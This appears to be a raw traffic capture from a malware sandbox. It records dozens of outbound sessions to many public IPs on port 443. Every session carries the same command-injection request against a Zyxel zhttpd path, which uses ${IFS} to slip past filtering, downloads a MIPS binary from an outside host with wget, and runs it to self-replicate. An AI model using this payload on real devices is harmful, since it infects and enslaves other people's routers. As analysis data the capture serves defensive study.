                                        Jan 14, 2024 16:18:54.684149027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6936192.168.2.1344012210.89.92.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684184074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6937192.168.2.1353446187.246.34.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684238911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6938192.168.2.1334114216.158.65.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684282064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6939192.168.2.1347800144.237.143.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684325933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6940192.168.2.1359170183.78.246.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684362888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6941192.168.2.1356120169.71.55.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684402943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6942192.168.2.1355122213.237.197.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684459925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6943192.168.2.136013453.153.85.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684485912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6944192.168.2.1335876117.252.223.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684530020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6945192.168.2.1360272118.56.51.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684559107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6946192.168.2.1334778194.202.245.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684608936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6947192.168.2.1352084189.211.116.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684664965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6948192.168.2.1353868177.201.108.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684716940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6949192.168.2.134789239.226.146.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684772968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6950192.168.2.135744271.135.242.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684799910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6951192.168.2.1346104216.54.221.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684847116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6952192.168.2.1339826193.244.191.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684932947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6953192.168.2.135637877.33.66.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684957027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6954192.168.2.134503247.45.26.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684998989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6955192.168.2.133309047.117.117.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685036898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6956192.168.2.1339262148.99.103.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685071945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6957192.168.2.1356176209.2.252.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685118914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6958192.168.2.1355230149.106.82.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685200930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6959192.168.2.1347584128.167.216.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685204029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6960192.168.2.1357858208.41.114.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685240030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6961192.168.2.134266650.108.69.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685266972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6962192.168.2.133754080.226.222.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685312033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6963192.168.2.135782478.46.136.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685372114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6964192.168.2.1334264105.227.184.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685399055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6965192.168.2.134619623.68.48.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685475111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6966192.168.2.1356082132.175.5.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685498953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6967192.168.2.1335522190.21.154.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685534000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6968192.168.2.133396667.192.9.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685574055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6969192.168.2.134112418.10.217.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685647964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6970192.168.2.135090845.163.255.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685664892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6971192.168.2.1342592150.0.234.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685715914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6972192.168.2.1356700150.69.55.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685736895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6973192.168.2.135269866.219.7.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685828924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6974192.168.2.133523871.59.71.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685880899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6975192.168.2.1335364156.111.99.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685931921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6976192.168.2.134329659.252.76.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.685960054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6977192.168.2.1358104128.194.118.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686002016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6978192.168.2.1350652181.145.212.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686039925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6979192.168.2.1347894191.119.58.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686077118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6980192.168.2.1335814112.144.197.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686137915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6981192.168.2.133599470.244.67.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686175108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6982192.168.2.1341776110.102.13.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686229944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6983192.168.2.134467050.247.219.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686247110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6984192.168.2.133951031.151.59.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686299086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6985192.168.2.1349888199.100.129.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686346054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6986192.168.2.1352324107.86.13.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686377048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6987192.168.2.135068824.75.184.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686423063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6988192.168.2.134535675.227.114.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686464071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6989192.168.2.134058691.141.153.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686497927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6990192.168.2.1358604165.192.104.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686543941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6991192.168.2.1339530150.133.95.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686568022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6992192.168.2.1336144164.40.32.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686630964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6993192.168.2.133565650.174.158.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686665058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6994192.168.2.1354544200.12.183.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686697006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6995192.168.2.133935859.85.141.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686731100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6996192.168.2.134610644.182.224.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686794043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6997192.168.2.1355614124.228.180.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.686829090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6998192.168.2.135613672.233.142.240443
                                        TimestampBytes transferredDirectionData
